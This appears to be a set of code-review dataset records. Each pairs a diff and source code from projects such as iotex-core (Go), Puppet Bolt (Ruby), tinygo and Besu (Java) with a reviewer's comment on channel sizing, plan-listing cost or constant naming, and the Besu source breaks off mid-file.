ProducerPrivateKey() crypto.PrivateKey { sk, err := crypto.HexStringToPrivateKey(cfg.Chain.ProducerPrivKey) if err != nil { log.L().Panic( "Error when decoding private key", zap.Error(err), ) } if !cfg.whitelistSignatureScheme(sk) { log.L().Panic("The private key's signature scheme is not whitelisted") } return sk } func (cfg Config) whitelistSignatureScheme(sk crypto.PrivateKey) bool { var sigScheme string switch sk.EcdsaPrivateKey().(type) { case *ecdsa.PrivateKey: sigScheme = SigP256k1 case *crypto.P256sm2PrvKey: sigScheme = SigP256sm2 } if sigScheme == "" { return false } for _, e := range cfg.Chain.SignatureScheme { if sigScheme == e { // signature scheme is whitelisted return true } } return false } func generateRandomKey(scheme string) string { // generate a random key switch scheme { case SigP256k1: sk, _ := crypto.GenerateKey() return sk.HexString() case SigP256sm2: sk, _ := crypto.GenerateKeySm2() return sk.HexString() } return "" } // MinGasPrice returns the minimal gas price threshold func (ap ActPool) MinGasPrice() *big.Int { mgp, ok := big.NewInt(0).SetString(ap.MinGasPriceStr, 10) if !ok { log.S().Panicf("Error when parsing minimal gas price string: %s", ap.MinGasPriceStr) } return mgp } // ValidateDispatcher validates the dispatcher configs func ValidateDispatcher(cfg Config) error { if cfg.Dispatcher.EventChanSize <= 0 { return errors.Wrap(ErrInvalidCfg, "dispatcher event chan size should be greater than 0") } return nil } // ValidateRollDPoS validates the roll-DPoS configs func ValidateRollDPoS(cfg Config) error { if cfg.Consensus.Scheme != RollDPoSScheme { return nil } rollDPoS := cfg.Consensus.RollDPoS fsm := rollDPoS.FSM if fsm.EventChanSize <= 0 { return errors.Wrap(ErrInvalidCfg, "roll-DPoS event chan size should be greater than 0") } return nil } // ValidateArchiveMode validates the state factory setting func ValidateArchiveMode(cfg Config) error { if !cfg.Chain.EnableArchiveMode || !cfg.Chain.EnableTrielessStateDB { return nil } return errors.Wrap(ErrInvalidCfg, "Archive mode is incompatible with trieless state DB") } // ValidateAPI validates the api configs func ValidateAPI(cfg Config) error { if cfg.API.TpsWindow <= 0 { return errors.Wrap(ErrInvalidCfg, "tps window is not a positive integer when the api is enabled") } return nil } // ValidateActPool validates the given config func ValidateActPool(cfg Config) error { maxNumActPerPool := cfg.ActPool.MaxNumActsPerPool maxNumActPerAcct := cfg.ActPool.MaxNumActsPerAcct if maxNumActPerPool <= 0 || maxNumActPerAcct <= 0 { return errors.Wrap( ErrInvalidCfg, "maximum number of actions per pool or per account cannot be zero or negative", ) } if maxNumActPerPool < maxNumActPerAcct { return errors.Wrap( ErrInvalidCfg, "maximum number of actions per pool cannot be less than maximum number of actions per account", ) } return nil } // ValidateForkHeights validates the forked heights func ValidateForkHeights(cfg Config) error { hu := NewHeightUpgrade(&cfg.Genesis) switch { case hu.PacificBlockHeight() > hu.AleutianBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Pacific is heigher than Aleutian") case hu.AleutianBlockHeight() > hu.BeringBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Aleutian is heigher than Bering") case hu.BeringBlockHeight() > hu.CookBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Bering is heigher than Cook") case hu.CookBlockHeight() > hu.DardanellesBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Cook is heigher than Dardanelles") case hu.DardanellesBlockHeight() > hu.DaytonaBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Dardanelles is heigher than Daytona") case hu.DaytonaBlockHeight() > hu.EasterBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Daytona is heigher than Easter") case hu.EasterBlockHeight() > hu.FbkMigrationBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Easter is heigher than FairbankMigration") case hu.FbkMigrationBlockHeight() > hu.FairbankBlockHeight(): return errors.Wrap(ErrInvalidCfg, "FairbankMigration is heigher than Fairbank") case hu.FairbankBlockHeight() > hu.GreenlandBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Fairbank is heigher than Greenland") } return nil } // DoNotValidate validates the given config func DoNotValidate(cfg Config) error { return nil }
1
23,244
is 10 too small compared to 1000? consider sync chan is unicast only (vs block chan is broadcast + unicast), i would say use 200~400 for BlockSyncChanSize my concern is that this would potentially slowdown sync speed of full-node
iotexproject-iotex-core
go
@@ -297,7 +297,7 @@ module Bolt errors.each do |error| @logger.warn(error.details['original_error']) end - plans + plans.reject { |plan| get_plan_info(plan.first)['private'] } end end
1
# frozen_string_literal: true require 'bolt/applicator' require 'bolt/executor' require 'bolt/error' require 'bolt/plan_result' require 'bolt/util' require 'etc' module Bolt class PAL BOLTLIB_PATH = File.expand_path('../../bolt-modules', __dir__) MODULES_PATH = File.expand_path('../../modules', __dir__) # PALError is used to convert errors from executing puppet code into # Bolt::Errors class PALError < Bolt::Error # Puppet sometimes rescues exceptions notes the location and reraises. # Return the original error. def self.from_preformatted_error(err) if err.cause&.is_a? Bolt::Error err.cause else from_error(err.cause || err) end end # Generate a Bolt::Pal::PALError for non-bolt errors def self.from_error(err) e = new(err.message) e.set_backtrace(err.backtrace) e end def initialize(msg) super(msg, 'bolt/pal-error') end end attr_reader :modulepath def initialize(modulepath, hiera_config, resource_types, max_compiles = Etc.nprocessors, trusted_external = nil) # Nothing works without initialized this global state. Reinitializing # is safe and in practice only happens in tests self.class.load_puppet @original_modulepath = modulepath @modulepath = [BOLTLIB_PATH, *modulepath, MODULES_PATH] @hiera_config = hiera_config @trusted_external = trusted_external @max_compiles = max_compiles @resource_types = resource_types @logger = Logging.logger[self] if modulepath && !modulepath.empty? @logger.info("Loading modules from #{@modulepath.join(File::PATH_SEPARATOR)}") end @loaded = false end # Puppet logging is global so this is class method to avoid confusion def self.configure_logging Puppet::Util::Log.destinations.clear Puppet::Util::Log.newdestination(Logging.logger['Puppet']) # Defer all log level decisions to the Logging library by telling Puppet # to log everything Puppet.settings[:log_level] = 'debug' end def self.load_puppet if Bolt::Util.windows? # Windows 'fix' for openssl behaving strangely. Prevents very slow operation # of random_bytes later when establishing winrm connections from a Windows host. # See https://github.com/rails/rails/issues/25805 for background. require 'openssl' OpenSSL::Random.random_bytes(1) end begin require 'puppet_pal' rescue LoadError raise Bolt::Error.new("Puppet must be installed to execute tasks", "bolt/puppet-missing") end require 'bolt/pal/logging' require 'bolt/pal/issues' require 'bolt/pal/yaml_plan/loader' require 'bolt/pal/yaml_plan/transpiler' # Now that puppet is loaded we can include puppet mixins in data types Bolt::ResultSet.include_iterable end def setup unless @loaded # This is slow so don't do it until we have to Bolt::PAL.load_puppet # Make sure we don't create the puppet directories with_puppet_settings { |_| nil } @loaded = true end end # Create a top-level alias for TargetSpec and PlanResult so that users don't have to # namespace it with Boltlib, which is just an implementation detail. This # allows them to feel like a built-in type in bolt, rather than # something has been, no pun intended, "bolted on". def alias_types(compiler) compiler.evaluate_string('type TargetSpec = Boltlib::TargetSpec') compiler.evaluate_string('type PlanResult = Boltlib::PlanResult') end # Register all resource types defined in $Boltdir/.resource_types as well as # the built in types registered with the runtime_3_init method. def register_resource_types(loaders) static_loader = loaders.static_loader static_loader.runtime_3_init if File.directory?(@resource_types) # Ruby 2.3 does not support Dir.children (Dir.entries(@resource_types) - %w[. ..]).each do |resource_pp| type_name_from_file = File.basename(resource_pp, '.pp').capitalize typed_name = Puppet::Pops::Loader::TypedName.new(:type, type_name_from_file) resource_type = Puppet::Pops::Types::TypeFactory.resource(type_name_from_file) loaders.static_loader.set_entry(typed_name, resource_type) end end end # Runs a block in a PAL script compiler configured for Bolt. Catches # exceptions thrown by the block and re-raises them ensuring they are # Bolt::Errors since the script compiler block will squash all exceptions. def in_bolt_compiler # TODO: If we always call this inside a bolt_executor we can remove this here setup r = Puppet::Pal.in_tmp_environment('bolt', modulepath: @modulepath, facts: {}) do |pal| pal.with_script_compiler do |compiler| alias_types(compiler) register_resource_types(Puppet.lookup(:loaders)) if @resource_types begin Puppet.override(yaml_plan_instantiator: Bolt::PAL::YamlPlan::Loader) do yield compiler end rescue Bolt::Error => e e rescue Puppet::PreformattedError => e PALError.from_preformatted_error(e) rescue StandardError => e PALError.from_preformatted_error(e) end end end # Plans may return PuppetError but nothing should be throwing them if r.is_a?(StandardError) && !r.is_a?(Bolt::PuppetError) raise r end r end def with_bolt_executor(executor, inventory, pdb_client = nil, applicator = nil, &block) setup opts = { bolt_executor: executor, bolt_inventory: inventory, bolt_pdb_client: pdb_client, apply_executor: applicator || Applicator.new( inventory, executor, @modulepath, # Skip syncing built-in plugins, since we vendor some Puppet 6 # versions of "core" types, which are already present on the agent, # but may cause issues on Puppet 5 agents. @original_modulepath, pdb_client, @hiera_config, @max_compiles ) } Puppet.override(opts, &block) end def in_plan_compiler(executor, inventory, pdb_client, applicator = nil) with_bolt_executor(executor, inventory, pdb_client, applicator) do # TODO: remove this call and see if anything breaks when # settings dirs don't actually exist. Plans shouldn't # actually be using them. with_puppet_settings do in_bolt_compiler do |compiler| yield compiler end end end end def in_task_compiler(executor, inventory) with_bolt_executor(executor, inventory) do in_bolt_compiler do |compiler| yield compiler end end end # TODO: PUP-8553 should replace this def with_puppet_settings Dir.mktmpdir('bolt') do |dir| cli = [] Puppet::Settings::REQUIRED_APP_SETTINGS.each do |setting| cli << "--#{setting}" << dir end Puppet.settings.send(:clear_everything_for_tests) Puppet.initialize_settings(cli) Puppet::GettextConfig.create_default_text_domain Puppet[:trusted_external_command] = @trusted_external self.class.configure_logging yield end end # Parses a snippet of Puppet manifest code and returns the AST represented # in JSON. def parse_manifest(code, filename) setup Puppet::Pops::Parser::EvaluatingParser.new.parse_string(code, filename) rescue Puppet::Error => e raise Bolt::PAL::PALError, "Failed to parse manifest: #{e}" end def list_tasks in_bolt_compiler do |compiler| tasks = compiler.list_tasks tasks.map(&:name).sort.each_with_object([]) do |task_name, data| task_sig = compiler.task_signature(task_name) unless task_sig.task_hash['metadata']['private'] data << [task_name, task_sig.task_hash['metadata']['description']] end end end end def list_modulepath @modulepath - [BOLTLIB_PATH, MODULES_PATH] end def parse_params(type, object_name, params) in_bolt_compiler do |compiler| if type == 'task' param_spec = compiler.task_signature(object_name)&.task_hash&.dig('parameters') elsif type == 'plan' plan = compiler.plan_signature(object_name) param_spec = plan.params_type.elements&.each_with_object({}) { |t, h| h[t.name] = t.value_type } if plan end param_spec ||= {} params.each_with_object({}) do |(name, str), acc| type = param_spec[name] begin parsed = JSON.parse(str, quirks_mode: true) # The type may not exist if the module is remote on orch or if a task # defines no parameters. Since we treat no parameters as Any we # should parse everything in this case acc[name] = if type && !type.instance?(parsed) str else parsed end rescue JSON::ParserError # This value may not be assignable in which case run_* will error acc[name] = str end acc end end end def task_signature(task_name) in_bolt_compiler do |compiler| compiler.task_signature(task_name) end end def get_task_info(task_name) task = task_signature(task_name) if task.nil? raise Bolt::Error.unknown_task(task_name) end task.task_hash.reject { |k, _| k == 'parameters' } end def list_plans in_bolt_compiler do |compiler| errors = [] plans = compiler.list_plans(nil, errors).map { |plan| [plan.name] }.sort errors.each do |error| @logger.warn(error.details['original_error']) end plans end end def get_plan_info(plan_name) plan_sig = in_bolt_compiler do |compiler| compiler.plan_signature(plan_name) end if plan_sig.nil? raise Bolt::Error.unknown_plan(plan_name) end mod = plan_sig.instance_variable_get(:@plan_func).loader.parent.path # If it's a Puppet language plan, use strings to extract data. The only # way to tell is to check which filename exists in the module. plan_subpath = File.join(plan_name.split('::').drop(1)) plan_subpath = 'init' if plan_subpath.empty? pp_path = File.join(mod, 'plans', "#{plan_subpath}.pp") if File.exist?(pp_path) require 'puppet-strings' require 'puppet-strings/yard' PuppetStrings::Yard.setup! YARD::Logger.instance.level = :error YARD.parse(pp_path) plan = YARD::Registry.at("puppet_plans::#{plan_name}") description = if plan.tag(:summary) plan.tag(:summary).text elsif !plan.docstring.empty? plan.docstring end defaults = plan.parameters.reject { |_, value| value.nil? }.to_h parameters = plan.tags(:param).each_with_object({}) do |param, params| name = param.name params[name] = { 'type' => param.types.first } params[name]['default_value'] = defaults[name] if defaults.key?(name) params[name]['description'] = param.text unless param.text.empty? end { 'name' => plan_name, 'description' => description, 'parameters' => parameters, 'module' => mod } # If it's a YAML plan, fall back to limited data else yaml_path = File.join(mod, 'plans', "#{plan_subpath}.yaml") plan_content = File.read(yaml_path) plan = Bolt::PAL::YamlPlan::Loader.from_string(plan_name, plan_content, yaml_path) parameters = plan.parameters.each_with_object({}) do |param, params| name = param.name type_str = case param.type_expr when Puppet::Pops::Types::PTypeReferenceType param.type_expr.type_string when nil 'Any' else param.type_expr end params[name] = { 'type' => type_str } params[name]['default_value'] = param.value params[name]['description'] = param.description if param.description end { 'name' => plan_name, 'description' => plan.description, 'parameters' => parameters, 'module' => mod } end end def convert_plan(plan_path) Puppet[:tasks] = true transpiler = YamlPlan::Transpiler.new transpiler.transpile(plan_path) end # Returns a mapping of all modules available to the Bolt compiler # # @return [Hash{String => Array<Hash{Symbol => String,nil}>}] # A hash that associates each directory on the module path with an array # containing a hash of information for each module in that directory. # The information hash provides the name, version, and a string # indicating whether the module belongs to an internal module group. def list_modules internal_module_groups = { BOLTLIB_PATH => 'Plan Language Modules', MODULES_PATH => 'Packaged Modules' } in_bolt_compiler do # NOTE: Can replace map+to_h with transform_values when Ruby 2.4 # is the minimum supported version. Puppet.lookup(:current_environment).modules_by_path.map do |path, modules| module_group = internal_module_groups[path] values = modules.map do |mod| mod_info = { name: (mod.forge_name || mod.name), version: mod.version } mod_info[:internal_module_group] = module_group unless module_group.nil? mod_info end [path, values] end.to_h end end def generate_types require 'puppet/face/generate' in_bolt_compiler do generator = Puppet::Generate::Type inputs = generator.find_inputs(:pcore) FileUtils.mkdir_p(@resource_types) generator.generate(inputs, @resource_types, true) end end def run_task(task_name, targets, params, executor, inventory, description = nil) in_task_compiler(executor, inventory) do |compiler| params = params.merge('_bolt_api_call' => true, '_catch_errors' => true) compiler.call_function('run_task', task_name, targets, description, params) end end def run_plan(plan_name, params, executor = nil, inventory = nil, pdb_client = nil, applicator = nil) in_plan_compiler(executor, inventory, pdb_client, applicator) do |compiler| r = compiler.call_function('run_plan', plan_name, params.merge('_bolt_api_call' => true)) Bolt::PlanResult.from_pcore(r, 'success') end rescue Bolt::Error => e Bolt::PlanResult.new(e, 'failure') end end end
1
13,788
A full parse of the plan here on listing the plans will be expensive from both a computation and IO perspective.
puppetlabs-bolt
rb
@@ -19,3 +19,9 @@ const ( BUTTON3 = 15 BUTTON4 = 16 ) + +// UART pins for NRF52840-DK +const ( + UART_TX_PIN = 6 + UART_RX_PIN = 8 +)
1
// +build nrf,pca10040 package machine // LEDs on the PCA10040 (nRF52832 dev board) const ( LED = LED1 LED1 = 17 LED2 = 18 LED3 = 19 LED4 = 20 ) // Buttons on the PCA10040 (nRF52832 dev board) const ( BUTTON = BUTTON1 BUTTON1 = 13 BUTTON2 = 14 BUTTON3 = 15 BUTTON4 = 16 )
1
5,882
These constants use the `_PIN` suffix, while the other constants don't use it. I'm not sure what is best, but I would prefer to keep this consistent. Do you have an opinion on which it should be (with or without suffix)?
tinygo-org-tinygo
go
@@ -1089,6 +1089,13 @@ public class BesuCommand implements DefaultCommandValues, Runnable { "Specifies the static node file containing the static nodes for this node to connect to") private final Path staticNodesFile = null; + @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. + @CommandLine.Option( + names = { "--dns-discovery-url" }, + description = "Specifies the URL to use for DNS discovery" + ) + private String dnsDiscoveryUrl = null; + private EthNetworkConfig ethNetworkConfig; private JsonRpcConfiguration jsonRpcConfiguration; private GraphQLConfiguration graphQLConfiguration;
1
/* * Copyright ConsenSys AG. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ package org.hyperledger.besu.cli; import static com.google.common.base.Preconditions.checkNotNull; import static java.nio.charset.StandardCharsets.UTF_8; import static java.util.Arrays.asList; import static java.util.Collections.singletonList; import static org.hyperledger.besu.cli.DefaultCommandValues.getDefaultBesuDataPath; import static org.hyperledger.besu.cli.config.NetworkName.MAINNET; import static org.hyperledger.besu.cli.util.CommandLineUtils.DEPENDENCY_WARNING_MSG; import static org.hyperledger.besu.controller.BesuController.DATABASE_PATH; import static org.hyperledger.besu.ethereum.api.graphql.GraphQLConfiguration.DEFAULT_GRAPHQL_HTTP_PORT; import static org.hyperledger.besu.ethereum.api.jsonrpc.JsonRpcConfiguration.DEFAULT_JSON_RPC_PORT; import static org.hyperledger.besu.ethereum.api.jsonrpc.RpcApis.DEFAULT_JSON_RPC_APIS; import static org.hyperledger.besu.ethereum.api.jsonrpc.websocket.WebSocketConfiguration.DEFAULT_WEBSOCKET_PORT; import static org.hyperledger.besu.ethereum.permissioning.GoQuorumPermissioningConfiguration.QIP714_DEFAULT_BLOCK; import static org.hyperledger.besu.metrics.BesuMetricCategory.DEFAULT_METRIC_CATEGORIES; import static org.hyperledger.besu.metrics.MetricsProtocol.PROMETHEUS; import static org.hyperledger.besu.metrics.prometheus.MetricsConfiguration.DEFAULT_METRICS_PORT; import static org.hyperledger.besu.metrics.prometheus.MetricsConfiguration.DEFAULT_METRICS_PUSH_PORT; import static org.hyperledger.besu.nat.kubernetes.KubernetesNatManager.DEFAULT_BESU_SERVICE_NAME_FILTER; import org.hyperledger.besu.BesuInfo; import org.hyperledger.besu.Runner; import org.hyperledger.besu.RunnerBuilder; import org.hyperledger.besu.chainexport.RlpBlockExporter; import org.hyperledger.besu.chainimport.JsonBlockImporter; import org.hyperledger.besu.chainimport.RlpBlockImporter; import org.hyperledger.besu.cli.config.EthNetworkConfig; import org.hyperledger.besu.cli.config.NetworkName; import org.hyperledger.besu.cli.converter.MetricCategoryConverter; import org.hyperledger.besu.cli.converter.PercentageConverter; import org.hyperledger.besu.cli.converter.RpcApisConverter; import org.hyperledger.besu.cli.custom.CorsAllowedOriginsProperty; import org.hyperledger.besu.cli.custom.JsonRPCAllowlistHostsProperty; import org.hyperledger.besu.cli.custom.RpcAuthFileValidator; import org.hyperledger.besu.cli.error.BesuExceptionHandler; import org.hyperledger.besu.cli.options.unstable.DataStorageOptions; import org.hyperledger.besu.cli.options.unstable.DnsOptions; import org.hyperledger.besu.cli.options.unstable.EthProtocolOptions; import org.hyperledger.besu.cli.options.unstable.EthstatsOptions; import org.hyperledger.besu.cli.options.unstable.LauncherOptions; import org.hyperledger.besu.cli.options.unstable.MetricsCLIOptions; import org.hyperledger.besu.cli.options.unstable.MiningOptions; import org.hyperledger.besu.cli.options.unstable.NatOptions; import org.hyperledger.besu.cli.options.unstable.NativeLibraryOptions; import org.hyperledger.besu.cli.options.unstable.NetworkingOptions; import org.hyperledger.besu.cli.options.unstable.RPCOptions; import org.hyperledger.besu.cli.options.unstable.SynchronizerOptions; import org.hyperledger.besu.cli.options.unstable.TransactionPoolOptions; import org.hyperledger.besu.cli.presynctasks.PreSynchronizationTaskRunner; import org.hyperledger.besu.cli.presynctasks.PrivateDatabaseMigrationPreSyncTask; import org.hyperledger.besu.cli.subcommands.PasswordSubCommand; import org.hyperledger.besu.cli.subcommands.PublicKeySubCommand; import org.hyperledger.besu.cli.subcommands.RetestethSubCommand; import org.hyperledger.besu.cli.subcommands.blocks.BlocksSubCommand; import org.hyperledger.besu.cli.subcommands.operator.OperatorSubCommand; import org.hyperledger.besu.cli.subcommands.rlp.RLPSubCommand; import org.hyperledger.besu.cli.util.BesuCommandCustomFactory; import org.hyperledger.besu.cli.util.CommandLineUtils; import org.hyperledger.besu.cli.util.ConfigOptionSearchAndRunHandler; import org.hyperledger.besu.cli.util.VersionProvider; import org.hyperledger.besu.config.GenesisConfigFile; import org.hyperledger.besu.config.GenesisConfigOptions; import org.hyperledger.besu.config.GoQuorumOptions; import org.hyperledger.besu.config.experimental.ExperimentalEIPs; import org.hyperledger.besu.controller.BesuController; import org.hyperledger.besu.controller.BesuControllerBuilder; import org.hyperledger.besu.controller.TargetingGasLimitCalculator; import org.hyperledger.besu.crypto.KeyPair; import org.hyperledger.besu.crypto.KeyPairSecurityModule; import org.hyperledger.besu.crypto.KeyPairUtil; import org.hyperledger.besu.crypto.NodeKey; import org.hyperledger.besu.crypto.SignatureAlgorithmFactory; import org.hyperledger.besu.crypto.SignatureAlgorithmType; import org.hyperledger.besu.enclave.EnclaveFactory; import org.hyperledger.besu.enclave.GoQuorumEnclave; import org.hyperledger.besu.ethereum.api.ApiConfiguration; import org.hyperledger.besu.ethereum.api.ImmutableApiConfiguration; import org.hyperledger.besu.ethereum.api.graphql.GraphQLConfiguration; import org.hyperledger.besu.ethereum.api.jsonrpc.JsonRpcConfiguration; import org.hyperledger.besu.ethereum.api.jsonrpc.RpcApi; import org.hyperledger.besu.ethereum.api.jsonrpc.RpcApis; import org.hyperledger.besu.ethereum.api.jsonrpc.websocket.WebSocketConfiguration; import org.hyperledger.besu.ethereum.api.tls.FileBasedPasswordProvider; import org.hyperledger.besu.ethereum.api.tls.TlsClientAuthConfiguration; import org.hyperledger.besu.ethereum.api.tls.TlsConfiguration; import org.hyperledger.besu.ethereum.blockcreation.GasLimitCalculator; import org.hyperledger.besu.ethereum.chain.Blockchain; import org.hyperledger.besu.ethereum.core.Address; import org.hyperledger.besu.ethereum.core.GoQuorumPrivacyParameters; import org.hyperledger.besu.ethereum.core.Hash; import org.hyperledger.besu.ethereum.core.MiningParameters; import org.hyperledger.besu.ethereum.core.PrivacyParameters; import org.hyperledger.besu.ethereum.core.Wei; import org.hyperledger.besu.ethereum.eth.sync.SyncMode; import org.hyperledger.besu.ethereum.eth.sync.SynchronizerConfiguration; import org.hyperledger.besu.ethereum.eth.transactions.TransactionPoolConfiguration; import org.hyperledger.besu.ethereum.mainnet.precompiles.AbstractAltBnPrecompiledContract; import org.hyperledger.besu.ethereum.p2p.config.DiscoveryConfiguration; import org.hyperledger.besu.ethereum.p2p.peers.EnodeDnsConfiguration; import org.hyperledger.besu.ethereum.p2p.peers.EnodeURL; import org.hyperledger.besu.ethereum.p2p.peers.StaticNodesParser; import org.hyperledger.besu.ethereum.permissioning.GoQuorumPermissioningConfiguration; import org.hyperledger.besu.ethereum.permissioning.LocalPermissioningConfiguration; import org.hyperledger.besu.ethereum.permissioning.PermissioningConfiguration; import org.hyperledger.besu.ethereum.permissioning.PermissioningConfigurationBuilder; import org.hyperledger.besu.ethereum.permissioning.SmartContractPermissioningConfiguration; import org.hyperledger.besu.ethereum.privacy.storage.keyvalue.PrivacyKeyValueStorageProvider; import org.hyperledger.besu.ethereum.privacy.storage.keyvalue.PrivacyKeyValueStorageProviderBuilder; import org.hyperledger.besu.ethereum.storage.StorageProvider; import org.hyperledger.besu.ethereum.storage.keyvalue.KeyValueStorageProvider; import org.hyperledger.besu.ethereum.storage.keyvalue.KeyValueStorageProviderBuilder; import org.hyperledger.besu.ethereum.worldstate.DefaultWorldStateArchive; import org.hyperledger.besu.ethereum.worldstate.PrunerConfiguration; import org.hyperledger.besu.ethereum.worldstate.WorldStateArchive; import org.hyperledger.besu.ethereum.worldstate.WorldStatePreimageStorage; import org.hyperledger.besu.ethereum.worldstate.WorldStateStorage; import org.hyperledger.besu.metrics.BesuMetricCategory; import org.hyperledger.besu.metrics.MetricCategoryRegistryImpl; import org.hyperledger.besu.metrics.MetricsProtocol; import org.hyperledger.besu.metrics.MetricsSystemFactory; import org.hyperledger.besu.metrics.ObservableMetricsSystem; import org.hyperledger.besu.metrics.StandardMetricCategory; import org.hyperledger.besu.metrics.prometheus.MetricsConfiguration; import org.hyperledger.besu.metrics.vertx.VertxMetricsAdapterFactory; import org.hyperledger.besu.nat.NatMethod; import org.hyperledger.besu.plugin.services.BesuConfiguration; import org.hyperledger.besu.plugin.services.BesuEvents; import org.hyperledger.besu.plugin.services.MetricsSystem; import org.hyperledger.besu.plugin.services.PicoCLIOptions; import org.hyperledger.besu.plugin.services.SecurityModuleService; import org.hyperledger.besu.plugin.services.StorageService; import org.hyperledger.besu.plugin.services.exception.StorageException; import org.hyperledger.besu.plugin.services.metrics.MetricCategory; import org.hyperledger.besu.plugin.services.metrics.MetricCategoryRegistry; import org.hyperledger.besu.plugin.services.securitymodule.SecurityModule; import org.hyperledger.besu.plugin.services.storage.PrivacyKeyValueStorageFactory; import org.hyperledger.besu.plugin.services.storage.rocksdb.RocksDBPlugin; import org.hyperledger.besu.services.BesuEventsImpl; import org.hyperledger.besu.services.BesuPluginContextImpl; import org.hyperledger.besu.services.PicoCLIOptionsImpl; import org.hyperledger.besu.services.SecurityModuleServiceImpl; import org.hyperledger.besu.services.StorageServiceImpl; import org.hyperledger.besu.services.kvstore.InMemoryStoragePlugin; import org.hyperledger.besu.util.NetworkUtility; import org.hyperledger.besu.util.PermissioningConfigurationValidator; import org.hyperledger.besu.util.number.Fraction; import org.hyperledger.besu.util.number.Percentage; import org.hyperledger.besu.util.number.PositiveNumber; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.math.BigInteger; import java.net.InetAddress; import java.net.SocketException; import java.net.URI; import java.net.UnknownHostException; import java.nio.file.Path; import java.time.Clock; import java.util.ArrayList; import java.util.Base64; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Optional; import java.util.OptionalLong; import java.util.Set; import java.util.TreeMap; import java.util.function.Function; import java.util.function.Supplier; import java.util.stream.Collectors; import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Strings; import com.google.common.base.Suppliers; import com.google.common.collect.ImmutableMap; import com.google.common.io.Files; import com.google.common.io.Resources; import io.vertx.core.Vertx; import io.vertx.core.VertxOptions; import io.vertx.core.json.DecodeException; import io.vertx.core.metrics.MetricsOptions; import net.consensys.quorum.mainnet.launcher.LauncherManager; import net.consensys.quorum.mainnet.launcher.config.ImmutableLauncherConfig; import net.consensys.quorum.mainnet.launcher.exception.LauncherException; import net.consensys.quorum.mainnet.launcher.util.ParseArgsHelper; import org.apache.logging.log4j.Level; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.core.config.Configurator; import org.apache.tuweni.bytes.Bytes; import org.apache.tuweni.units.bigints.UInt256; import picocli.CommandLine; import picocli.CommandLine.AbstractParseResultHandler; import picocli.CommandLine.Command; import picocli.CommandLine.ExecutionException; import picocli.CommandLine.Option; import picocli.CommandLine.ParameterException; @SuppressWarnings("FieldCanBeLocal") // because Picocli injected fields report false positives @Command( description = "This command runs the Besu Ethereum client full node.", abbreviateSynopsis = true, name = "besu", mixinStandardHelpOptions = true, versionProvider = VersionProvider.class, header = "Usage:", synopsisHeading = "%n", descriptionHeading = "%nDescription:%n%n", optionListHeading = "%nOptions:%n", footerHeading = "%n", footer = "Besu is licensed under the Apache License 2.0") public class BesuCommand implements DefaultCommandValues, Runnable { @SuppressWarnings("PrivateStaticFinalLoggers") // non-static for testing private final Logger logger; private CommandLine commandLine; private final Supplier<RlpBlockImporter> rlpBlockImporter; private final Function<BesuController, JsonBlockImporter> jsonBlockImporterFactory; private final Function<Blockchain, RlpBlockExporter> rlpBlockExporterFactory; // Unstable CLI options final NetworkingOptions unstableNetworkingOptions = NetworkingOptions.create(); final SynchronizerOptions unstableSynchronizerOptions = SynchronizerOptions.create(); final EthProtocolOptions unstableEthProtocolOptions = EthProtocolOptions.create(); final MetricsCLIOptions unstableMetricsCLIOptions = MetricsCLIOptions.create(); final TransactionPoolOptions unstableTransactionPoolOptions = TransactionPoolOptions.create(); private final EthstatsOptions unstableEthstatsOptions = EthstatsOptions.create(); private final DataStorageOptions unstableDataStorageOptions = DataStorageOptions.create(); private final DnsOptions unstableDnsOptions = DnsOptions.create(); private final MiningOptions unstableMiningOptions = MiningOptions.create(); private final NatOptions unstableNatOptions = NatOptions.create(); private final NativeLibraryOptions unstableNativeLibraryOptions = NativeLibraryOptions.create(); private final RPCOptions unstableRPCOptions = RPCOptions.create(); final LauncherOptions unstableLauncherOptions = LauncherOptions.create(); private final RunnerBuilder runnerBuilder; private final BesuController.Builder controllerBuilderFactory; private final BesuPluginContextImpl besuPluginContext; private final StorageServiceImpl storageService; private final SecurityModuleServiceImpl securityModuleService; private final Map<String, String> environment; private final MetricCategoryRegistryImpl metricCategoryRegistry = new MetricCategoryRegistryImpl(); private final MetricCategoryConverter metricCategoryConverter = new MetricCategoryConverter(); // Public IP stored to prevent having to research it each time we need it. private InetAddress autoDiscoveredDefaultIP = null; private final PreSynchronizationTaskRunner preSynchronizationTaskRunner = new PreSynchronizationTaskRunner(); private final Set<Integer> allocatedPorts = new HashSet<>(); // CLI options defined by user at runtime. // Options parsing is done with CLI library Picocli https://picocli.info/ // While this variable is never read it is needed for the PicoCLI to create // the config file option that is read elsewhere. @SuppressWarnings("UnusedVariable") @CommandLine.Option( names = {CONFIG_FILE_OPTION_NAME}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "TOML config file (default: none)") private final File configFile = null; @CommandLine.Option( names = {"--data-path"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "The path to Besu data directory (default: ${DEFAULT-VALUE})") final Path dataPath = getDefaultBesuDataPath(this); // Genesis file path with null default option if the option // is not defined on command line as this default is handled by Runner // to use mainnet json file from resources as indicated in the // default network option // Then we have no control over genesis default value here. @CommandLine.Option( names = {"--genesis-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Genesis file. Setting this option makes --network option ignored and requires --network-id to be set.") private final File genesisFile = null; @CommandLine.Option( names = {"--node-private-key-file"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "The node's private key file (default: a file named 